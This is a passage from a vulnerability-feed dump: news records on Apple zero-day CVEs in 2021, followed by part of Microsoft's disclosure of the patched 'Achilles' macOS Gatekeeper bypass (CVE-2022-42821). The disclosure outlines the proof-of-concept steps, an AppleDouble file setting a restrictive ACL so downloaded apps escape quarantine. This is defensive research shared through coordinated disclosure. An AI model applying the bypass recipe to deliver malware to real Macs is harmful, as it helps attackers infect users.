[**CVE-2021-1870**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1871**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [**CVE-2021-30657**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [**CVE-2021-30661**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30663**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30665**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30666**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30713**](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n\nUsers of Apple devices are recommended to update to the latest versions to mitigate the risk associated with the vulnerabilities.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T03:32:00", "type": "thn", "title": "Apple Issues Urgent Patches for 2 Zero-Day Flaws Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30737", "CVE-2021-30761", "CVE-2021-30762"], "modified": "2021-06-15T10:08:36", "id": "THN:0D13405795D42B516C33D8E56A44BA9D", "href": "https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:18", "description": "[![](https://thehackernews.com/images/-b6kGmU8c6Gc/YP-1oely-GI/AAAAAAAADV0/MURJ7OCSDsoeAi2sHU_Bb2cqNT4e2C-qACLcBGAsYHQ/s0/apple-iphone-hacking.jpg)](<https://thehackernews.com/images/-b6kGmU8c6Gc/YP-1oely-GI/AAAAAAAADV0/MURJ7OCSDsoeAi2sHU_Bb2cqNT4e2C-qACLcBGAsYHQ/s0/apple-iphone-hacking.jpg>)\n\nApple on Monday rolled out an urgent security update for [iOS, iPadOS](<https://support.apple.com/en-us/HT212622>), and [macOS](<https://support.apple.com/en-us/HT212623>) to address a zero-day flaw that it said may have been actively exploited, making it the thirteenth such vulnerability Apple has patched since the start of this year.\n\nThe updates, which arrive less than a week after the company released iOS 14.7, iPadOS 14.7, and macOS Big Sur 11.5 to the public, fixes a memory corruption issue (**CVE-2021-30807**) in the IOMobileFrameBuffer component, a kernel extension for managing the screen [framebuffer](<https://en.wikipedia.org/wiki/Framebuffer>), that could be abused to execute arbitrary code with kernel privileges.\n\nThe company said it addressed the issue with improved memory handling, noting it's \"aware of a report that this issue may have been actively exploited.\" As is typically the case, additional details about the flaw have not been disclosed to prevent the weaponization of the vulnerability for additional attacks. Apple credited an anonymous researcher for discovering and reporting the vulnerability.\n\nThe timing of the update also raises questions about whether the zero-day had any role in compromising iPhones using NSO Group's [Pegasus software](<https://forbiddenstories.org/case/the-pegasus-project/>), which has become the focus of a series of [investigative reports](<https://thehackernews.com/2021/07/new-leak-reveals-abuse-of-pegasus.html>) that have exposed how the spyware tool turned mobile phones of journalists, human rights activists, and others into portable surveillance devices, granting complete access to sensitive information stored in them.\n\nCVE-2021-30807 is also the thirteenth zero-day vulnerability addressed by Apple this year alone, including \u2014\n\n * [CVE-2021-1782](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * [CVE-2021-1870](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [CVE-2021-1871](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [CVE-2021-1879](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [CVE-2021-30661](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30663](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30665](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30666](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30713](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n * [CVE-2021-30761](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30762](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n\nGiven the [public availability](<https://twitter.com/b1n4r1b01/status/1419734027565617165>) of a proof-of-concept (PoC) exploit, it's highly recommended that users move quickly to update their devices to the latest version to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-27T07:28:00", "type": "thn", "title": "Apple Releases Urgent 0-Day Bug Patch for Mac, iPhone and iPad Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807"], "modified": "2021-07-27T11:14:04", "id": "THN:080F85D43290560CDED8F282EE277B00", "href": "https://thehackernews.com/2021/07/apple-releases-urgent-0-day-bug-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:14", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEj9Bd2VdAXWvbASf8YmWxr5iArtahL17_NleXHz62PXrscVcuyhLoDB7s3THH7T3H2cNZseMCfhLHRI9u5ESRDFZknnkYq6qqLc5c9bPFMM7KFlt0MGfj_ufHze0jtqtN8jGQiQUtNiSL3Kgq8Vsdc1lkrooiJsHq3ucrJQr03nO_OVN3I2C0POzJAs)](<https://thehackernews.com/new-images/img/a/AVvXsEj9Bd2VdAXWvbASf8YmWxr5iArtahL17_NleXHz62PXrscVcuyhLoDB7s3THH7T3H2cNZseMCfhLHRI9u5ESRDFZknnkYq6qqLc5c9bPFMM7KFlt0MGfj_ufHze0jtqtN8jGQiQUtNiSL3Kgq8Vsdc1lkrooiJsHq3ucrJQr03nO_OVN3I2C0POzJAs>)\n\nApple on Monday released a security update for iOS and iPad to address a critical vulnerability that it says is being exploited in the wild, making it the 17th zero-day flaw the company has addressed in its products since the start of the year.\n\nThe weakness, assigned the identifier [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>), concerns a memory corruption issue in the \"IOMobileFrameBuffer\" component that could allow an application to execute arbitrary code with kernel privileges. Crediting an anonymous researcher for reporting the vulnerability, Apple said it's \"aware of a report that this issue may have been actively exploited.\"\n\nTechnical specifics about the flaw and the nature of the attacks remain unavailable as yet, as is the identity of the threat actor, so as to allow a majority of the users to apply the patch and prevent other adversaries from weaponizing the vulnerability. The iPhone maker said it addressed the issue with improved memory handling.\n\nBut soon after the advisory was released, security researcher Saar Amar [shared](<https://saaramar.github.io/IOMFB_integer_overflow_poc/>) additional details, and a proof-of-concept (PoC) exploit, noting that \"this attack surface is highly interesting because it's accessible from the app sandbox (so it's great for jailbreaks) and many other processes, making it a good candidate for LPEs exploits in chains.\"\n\nCVE-2021-30883 is also the second zero-day impacting IOMobileFrameBuffer after Apple addressed a similar, anonymously reported memory corruption issue (CVE-2021-30807) in July 2021, raising the possibility that the two flaws could be related. With the latest fix, the company has resolved a record 17 zero-days to date in 2021 alone \u2014\n\n * [**CVE-2021-1782**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * [**CVE-2021-1870**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1871**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [**CVE-2021-30657**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [**CVE-2021-30661**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30663**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30665**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30666**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30713**](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n * [**CVE-2021-30761**](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30762**](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30807**](<https://thehackernews.com/2021/07/apple-releases-urgent-0-day-bug-patch.html>) (IOMobileFrameBuffer) - An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2021-30858**](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30860**](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) (CoreGraphics) - Processing a maliciously crafted PDF may lead to arbitrary code execution\n * [**CVE-2021-30869**](<https://thehackernews.com/2021/09/urgent-apple-ios-and-macos-updates.html>) (XNU) - A malicious application may be able to execute arbitrary code with kernel privileges\n\nApple iPhone and iPad users are highly recommended to update to the latest version (iOS 15.0.2 and iPad 15.0.2) to mitigate the security vulnerability.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T02:41:00", "type": "thn", "title": "Apple Releases Urgent iPhone and iPad Updates to Patch New Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883"], "modified": "2021-10-20T05:21:18", "id": "THN:BB8CDCFD08801BDD2929E342853D03E9", "href": "https://thehackernews.com/2021/10/apple-releases-urgent-iphone-and-ipad.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-20T03:05:16", "description": "On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple\u2019s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call \u201cAchilles\u201d. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.\n\nAfter carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/msrc/msvr>) (MSVR). Fixes for the vulnerability, now identified as [CVE-2022-42821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42821>), were quickly released by Apple to all their OS versions. We note that Apple's [Lockdown Mode](<https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/>), introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.\n\nIn this blog post, we share information about [Gatekeeper](<https://support.apple.com/en-us/HT202491>) and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.\n\n## Unlocking the Gatekeeper security mechanism\n\nMany macOS infections are the result of users running malware, oftentimes inadvertently. Fake app bundles might masquerade themselves as different apps, like Flash Player, or as a legitimate file, such as using a PDF icon and using the app name \u201cResume\u201d. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named _com.apple.quarantine_ and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent [sandbox escapes](<https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/>). In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:\n\n 1. If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user\u2019s consent before its launched.\n 2. Otherwise, the user is informed that the app cannot be run as it\u2019s untrusted.\n\nExtended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the _com.apple.quarantine_ attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:\n \n \n flag;date;agent_name;UUID\n\nExtended attributes can be viewed or modified with the [_xattr_](<https://ss64.com/osx/xattr.html>) command line utility.\n\nA flag value of \u201c0083\u201d enforces Gatekeeper restrictions on the file, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-1.-A-common-com.apple_.quarantine-extended-attribute-value.png)Figure 1. A common _com.apple.quarantine_ extended attribute value ![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-2.-Gatekeeper-blocking-an-untrusted-downloaded-file.png)Figure 2. Gatekeeper blocking an untrusted downloaded file\n\nDue to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications as sometimes malware authors leverage those techniques for initial access.\n\n## Historical overview of Gatekeeper bypasses\n\nNumerous Gatekeeper bypasses have been identified in the past years, some even [abused by malware families](<https://www.bleepingcomputer.com/news/security/apple-fixes-macos-zero-day-bug-exploited-by-shlayer-malware/>) such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:\n\n 1. Misuse the _com.apple.quarantine_ extended attribute assignment.\n 2. Find a vulnerability in the components that enforce policy checks on quarantined files.\n\nTwo cases that we don\u2019t consider to constitute a \u201ctrue\u201d Gatekeeper bypass are:\n\n 1. Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.\n 2. MITRE\u2019s definition of \u201cGatekeeper Bypass\u201d ([T1553.001](<https://attack.mitre.org/techniques/T1553/001/>)), which requires code execution to forcefully modify or remove the _com.apple.quarantine_ extended attribute.\n\nHere are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:\n\n**Vulnerability**| **Exploits**| **Description** \n---|---|--- \n**[CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)**| Assignment of the quarantine attribute.| Gzip files archived in BOM archives are not assigned with the quarantine extended attribute, further detailed [here](<https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/>). \n**[CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>)**| Assignment of the quarantine attribute.| Paths longer than 886 characters were not assigned with extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned with the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined [here](<https://labs.withsecure.com/blog/the-discovery-of-cve-2021-1810/>). \n**[CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)**| Component(s) that enforce policy checks.| App bundles with a missing _Info.plist_ and a shell script main executable component are treated incorrectly by _syspolicyd_, a component that enforces policy restrictions on apps. Writeups can be found [here](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) and [here](<https://objective-see.org/blog/blog_0x64.html>). \n**[CVE-2021-30853](<https://nvd.nist.gov/vuln/detail/CVE-2021-30853>)**| Component(s) that enforce policy checks.| A security bug in the way files with a \u201c_Shebang_\u201d (#!) header are interpreted by _syspolicyd_ cause it to consider the app bundle to be safe, as detailed [here](<https://objective-see.org/blog/blog_0x6A.html>). \n**[CVE-2019-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8656>)**| Assignment of the quarantine attribute.| Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented [here](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>). \n**[CVE-2014-8826](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8826>)**| Component(s) that enforce policy checks.| Quarantine attributes are not checked for JAR files, which are run by Java, as summarized [here](<https://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html>). \n \n## Metadata persistence over AppleDouble\n\nIntrigued by [CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>), as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering symbolic links are preserved in archives and aren\u2019t assigned with quarantine attributes\u2014we looked for a mechanism that could persist different kinds of metadata over archives.\n\nAfter some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.\n\nEven though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, [back in 1994](<https://www.rfc-editor.org/rfc/rfc1740.txt>), Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there\u2019s only a \u201csingle\u201d file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a \u201c._\u201d prefix.\n\nInterestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.\n\nThe AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in [the file](<https://github.com/apple/darwin-xnu/blob/main/bsd/vfs/vfs_xattr.c>) that handles extended attributes, which also includes ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the [_ditto_](<https://ss64.com/osx/ditto.html>) utility as such:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-3.-AppleDouble-file-created-as-._somefile.png)Figure 3. AppleDouble file created as \u201c._somefile\u201d\n\nWhen the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-4.-Using-AppleDouble-in-a-zip-file-to-preserve-extended-attributes.png)Figure 4. Using AppleDouble in a zip file to preserve extended attributes\n\nUsing this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.\n\nOur first approach was to generate many large extended attributes in the AppleDouble format such that there won\u2019t be enough space to assign the _com.apple.quarantine_ extended attribute. Interestingly, it doesn\u2019t work\u2014AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file could get (besides the size of the disk).\n\nResearching further, we decided to examine the [source code](<https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html>) of the unarchiving mechanism. Carefully studying the _copyfile_unpack_ implementation, we discovered an option for a special extended attribute named _com.apple.acl.text_ (saved in the _XATTR_SECURITY_NAME_ constant in the source code), which is used to set arbitrary Access Control Lists.\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-5.-The-code-that-allows-setting-arbitrary-Access-Control-Lists-1024x560.png)Figure 5. The code that allows setting arbitrary Access Control Lists\n\n## Using ACLs for exploitation\n\nAccess Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves permission for each file in a file \u201cmode\u201d, which can be changed by using the [_chmod_](<https://ss64.com/osx/chmod.html>) utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file\u2019s mode can be viewed by listing files with the \u201c_-l_\u201d (long) flag:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-6.-Viewing-the-hello.sh-file-mode-the-owner-can-do-anything-while-others-can-only-read-or-launch-it.png)Figure 6. Viewing the "hello.sh" file mode, the owner can do anything while others can only read or launch it\n\nUnlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the _chmod_ utility and viewed with the _ls_ utility. It\u2019s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-7.-Denying-file-reads-from-everyone-makes-it-impossible-to-read-the-file-despite-its-mode.png)Figure 7. Denying file reads from everyone makes it impossible to read the file despite its mode\n\nThe set of authorizations supported by ACLs is well-documented by Apple in the _chmod_ manual, which contain more than the traditional reading, writing, or launching abilities, including:\n\n * _writeattr_: controls the ability to write attributes to the file\n * _writeextattr_: controls the ability to write extended attributes to the file\n * _writesecurity_: controls the ability to set ACLs to the file\n * _chown_: controls the ability to set the owner of the file\n * _delete:_ controls the ability to delete the file\n\nEquipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the _com.apple.quarantine_ attribute.\n\nTwo minor challenges that we had to overcome during the proof-of-concept (POC) development were:\n\n * The format of the ACL text as saved in the AppleDouble file isn\u2019t identical to the format of the _chmod_ command line. This can easily be overcome by invoking the macOS [_acl_to_text_](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/acl_to_text.3.html>) API and saving the ACL with the correct format.\n * When using the _ditto_ utility, the _com.apple.acl.text_ extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.\n\nTherefore, our POC is as follows:\n\n 1. Create a fake directory structure with an arbitrary icon and payload.\n 2. Create an AppleDouble file with the _com.apple.acl.text_ extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of \u201c_everyone deny write,writeattr,writeextattr,writesecurity,chown_\u201d). Perform the correct AppleDouble patching if using _ditto_ to generate the AppleDouble file.\n 3. Create an archive with the application alongside its AppleDouble file and host it on a web server.\n\nWe named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:\n\nThe AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-8.-Generic-AppleDouble-file-that-can-be-used-for-any-Gatekeeper-bypass.png)Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass\n\n## Improving security for all through research and threat intelligence sharing\n\nThe threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues\u2014regardless of the platform or device in use.\n\nAs environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using 